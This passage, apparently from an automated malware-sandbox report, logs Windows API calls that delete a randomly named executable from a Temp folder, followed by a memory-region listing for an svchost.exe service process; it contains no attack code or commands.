lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x26e8a8, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x26e8ac, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x26e8a8*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0071.329] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0071.329] _wcsicmp (_String1="lambdoidtegument.exe", _String2=".") returned 62 [0071.329] _wcsicmp (_String1="lambdoidtegument.exe", _String2="..") returned 62 [0071.329] GetFileAttributesW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe")) returned 0x2020 [0071.329] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x81ea0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.329] SetErrorMode (uMode=0x0) returned 0x1 [0071.329] SetErrorMode (uMode=0x1) returned 0x0 [0071.329] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", nBufferLength=0x104, lpBuffer=0x26eccc, lpFilePart=0x26ecb4 | out: lpBuffer="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", lpFilePart=0x26ecb4*="lambdoidtegument.exe") returned 0x39 [0071.329] SetErrorMode (uMode=0x1) returned 0x1 [0071.329] GetFileAttributesW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp")) returned 0x2010 [0071.329] _wcsicmp (_String1="lambdoidtegument.exe", _String2=".") returned 62 [0071.329] _wcsicmp (_String1="lambdoidtegument.exe", _String2="..") returned 62 [0071.329] GetFileAttributesW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe")) returned 0x2020 [0071.329] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", fInfoLevelId=0x0, lpFindFileData=0x8013c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8013c) returned 0x82410 [0071.330] DeleteFileW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe")) returned 1 [0071.332] FindNextFileW (in: hFindFile=0x82410, lpFindFileData=0x8013c | out: lpFindFileData=0x8013c) returned 0 [0071.333] GetLastError () returned 0x12 [0071.333] FindClose (in: hFindFile=0x82410 | out: hFindFile=0x82410) returned 1 [0071.333] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.333] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0071.333] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.333] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a2f41ac | out: lpMode=0x4a2f41ac) returned 1 [0071.333] _get_osfhandle (_FileHandle=0) returned 0x3 [0071.333] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a2f41b0 | out: lpMode=0x4a2f41b0) returned 1 [0071.334] SetConsoleInputExeNameW () returned 0x1 [0071.334] GetConsoleOutputCP () returned 0x1b5 [0071.334] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a2f4260 | out: lpCPInfo=0x4a2f4260) returned 1 [0071.334] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.334] exit (_Code=0) Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f1e6160" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x610" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a152" [0xc000000f], "LOCAL" [0x7] Region: id = 1545 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1546 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1547 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1548 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1549 start_va = 0x50000 end_va = 0x51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1550 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1551 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1552 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1553 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1554 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1555 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1556 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1557 start_va = 0x290000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1558 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 1559 start_va = 0x3b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1560 start_va = 0x4c0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1561 start_va = 0x500000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1562 start_va = 0x520000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1563 start_va = 0x540000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1564 start_va = 0x560000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1565 start_va = 0x5a0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1566 start_va = 0x5e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 1567 start_va = 0x5f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 1568 start_va = 0x600000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1569 start_va = 0x640000 end_va = 0x680fff entry_point = 0x640000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 1570 start_va = 0x690000 end_va = 0x690fff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1571 start_va = 0x6a0000 end_va = 0x6a0fff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1572 start_va = 0x6b0000 end_va = 0x6b7fff entry_point = 0x6b0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1573 start_va = 0x6c0000 end_va = 0xab2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 1574 start_va = 0xac0000 end_va = 0xac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 1575 start_va = 0xad0000 end_va = 0xb17fff entry_point = 0xad0000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 1576 start_va = 0xb20000 end_va = 0xb21fff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 1577 start_va = 0xb30000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 1578 start_va = 0xb70000 end_va = 0xe3efff entry_point = 0xb70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1579 start_va = 0xe40000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 1580 start_va = 0xf40000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 1581 start_va = 0xf80000 end_va = 0xfbffff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 1582 start_va = 0xfc0000 end_va = 0xfc7fff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 1583 start_va = 0xfd0000 end_va = 0xfd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 1584 start_va = 0xfe0000 end_va = 0xfe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fe0000" filename = "" Region: id = 1585 start_va = 0xff0000 end_va = 0xff0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ff0000" filename = "" Region: id = 1586 start_va = 0x1000000 end_va = 0x1000fff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 1587 start_va = 0x1050000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 1588 start_va = 0x10a0000 end_va = 0x10dffff entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 1589 start_va = 0x1120000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 1590 start_va = 0x1190000 end_va = 0x11cffff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 1591 start_va = 0x11d0000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 1592 start_va = 0x12d0000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 1593 start_va = 0x13d0000 end_va = 0x1417fff entry_point = 0x13d0000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 1594 start_va = 0x1460000 end_va = 0x149ffff entry_point = 0x0 region_type = private name = "private_0x0000000001460000" filename = "" Region: id = 1595 start_va = 0x14b0000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 1596 start_va = 0x1510000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 1597 start_va = 0x1550000 end_va = 0x158ffff entry_point = 0x0 region_type = private name = "private_0x0000000001550000" filename = "" Region: id = 1598 start_va = 0x15a0000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 1599 start_va = 0x15e0000 end_va = 0x161ffff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 1600 start_va = 0x1650000 end_va = 0x168ffff entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 1601 start_va = 0x1690000 end_va = 0x188ffff entry_point = 0x0 region_type = private name = "private_0x0000000001690000" filename = "" Region: id = 1602 start_va = 0x1890000 end_va = 0x1c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001890000" filename = "" Region: id = 1603 start_va = 0x1c90000 end_va = 0x1d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 1604 start_va = 0x1d20000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 1605 start_va = 0x1d80000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 1606 start_va = 0x1dc0000 end_va = 0x1dfffff entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 1607 start_va = 0x1e00000 end_va = 0x2201fff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 1608 start_va = 0x2340000 end_va = 0x237ffff entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 1609 start_va = 0x23e0000 end_va = 0x241ffff entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 1610 start_va = 0x2450000 end_va = 0x248ffff entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 1611 start_va = 0x63890000 end_va = 0x6391bfff entry_point = 0x63890000 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1612 start_va = 0x63920000 end_va = 0x63a0afff entry_point = 0x63920000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1613 start_va = 0x6e040000 end_va = 0x6e075fff entry_point = 0x6e040000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 1614 start_va = 0x6f270000 end_va = 0x6f284fff entry_point = 0x6f270000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1615 start_va = 0x6f290000 end_va = 0x6f2a3fff entry_point = 0x6f290000 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 1616 start_va = 0x6f3b0000 end_va = 0x6f3b2fff entry_point = 0x6f3b0000 region_type = mapped_file name = "winmgmtr.dll" filename = "\\Windows\\System32\\wbem\\WinMgmtR.dll" (normalized: "c:\\windows\\system32\\wbem\\winmgmtr.dll") Region: id = 1617 start_va = 0x6f650000 end_va = 0x6f65efff entry_point = 0x6f650000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1618 start_va = 0x6f860000 end_va = 0x6f869fff entry_point = 0x6f860000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1619 start_va = 0x6f870000 end_va = 0x6f887fff entry_point = 0x6f870000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1620 start_va = 0x6f890000 end_va = 0x6f925fff entry_point = 0x6f890000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1621 start_va = 0x6fa60000 end_va = 0x6fabbfff entry_point = 0x6fa60000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1622 start_va = 0x73250000 end_va = 0x73261fff entry_point = 0x73250000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1623 start_va = 0x73270000 end_va = 0x7327cfff entry_point = 0x73270000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1624 start_va = 0x73310000 end_va = 0x73340fff entry_point = 0x73310000 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 1625 start_va = 0x73350000 end_va = 0x7338ffff entry_point = 0x73350000 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 1626 start_va = 0x733a0000 end_va = 0x733a5fff entry_point = 0x733a0000 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 1627 start_va = 0x733b0000 end_va = 0x733b6fff entry_point = 0x733b0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1628 start_va = 0x733c0000 end_va = 0x733dbfff entry_point = 0x733c0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1629 start_va = 0x733e0000 end_va = 0x733e7fff entry_point = 0x733e0000 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 1630 start_va = 0x73730000 end_va = 0x73736fff entry_point = 0x73730000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1631 start_va = 0x73740000 end_va = 0x73764fff entry_point = 0x73740000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1632 start_va = 0x73770000 end_va = 0x737e9fff entry_point = 0x73770000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 1633 start_va = 0x737f0000 end_va = 0x73810fff entry_point = 0x737f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1634 start_va = 0x73960000 end_va = 0x7396efff entry_point = 0x73960000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1635 start_va = 0x73970000 end_va = 0x73978fff entry_point = 0x73970000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1636 start_va = 0x73bf0000 end_va = 0x73c28fff entry_point = 0x73bf0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1637 start_va = 0x73f40000 end_va = 0x74034fff entry_point = 0x73f40000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1638 start_va = 0x744e0000 end_va = 0x745ebfff entry_point = 0x744e0000 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 1639 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1640 start_va = 0x74600000 end_va = 0x74675fff entry_point = 0x74600000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1641 start_va = 0x74680000 end_va = 0x74684fff entry_point = 0x74680000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1642 start_va = 0x74730000 end_va = 0x74745fff entry_point = 0x74730000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1643 start_va = 0x74750000 end_va = 0x74766fff entry_point = 0x74750000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1644 start_va = 0x74840000 end_va = 0x74847fff entry_point = 0x74840000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1645 start_va = 0x74910000 end_va = 0x7494afff entry_point = 0x74910000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1646 start_va = 0x749f0000 end_va = 0x74a33fff entry_point = 0x749f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1647 start_va = 0x74b20000 end_va = 0x74b25fff entry_point = 0x74b20000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1648 start_va = 0x74b30000 end_va = 0x74b6bfff entry_point = 0x74b30000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1649 start_va = 0x74b70000 end_va = 0x74b85fff entry_point = 0x74b70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1650 start_va = 0x74d30000 end_va = 0x74d71fff entry_point = 0x74d30000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1651 start_va = 0x74fb0000 end_va = 0x74fb7fff entry_point = 0x74fb0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1652 start_va = 0x74fd0000 end_va = 0x74feafff entry_point = 0x74fd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1653 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1654 start_va = 0x75060000 end_va = 0x75088fff entry_point = 0x75060000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1655 start_va = 0x75090000 end_va = 0x7509dfff entry_point = 0x75090000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1656 start_va = 0x750a0000 end_va = 0x750aafff entry_point = 0x750a0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1657 start_va = 0x75110000 end_va = 0x7511bfff entry_point = 0x75110000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1658 start_va = 0x75120000 end_va = 0x7523cfff entry_point = 0x75120000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1659 start_va = 0x75240000 end_va = 0x75251fff entry_point = 0x75240000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1660 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1661 start_va = 0x75340000 end_va = 0x7536cfff entry_point = 0x75340000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1662 start_va = 0x75370000 end_va = 0x75396fff entry_point = 0x75370000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1663 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1664 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1665 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1666 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1667 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1668 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1669 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1670 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1671 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1672 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1673 start_va = 0x76910000 end_va = 0x76aacfff entry_point = 0x76910000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1674 start_va = 0x76ab0000 end_va = 0x76b32fff entry_point = 0x76ab0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1675 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1676 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1677 start_va = 0x76df0000 end_va = 0x76e34fff entry_point = 0x76df0000 region_type = mapped_file name = "wldap32.dll" filename = 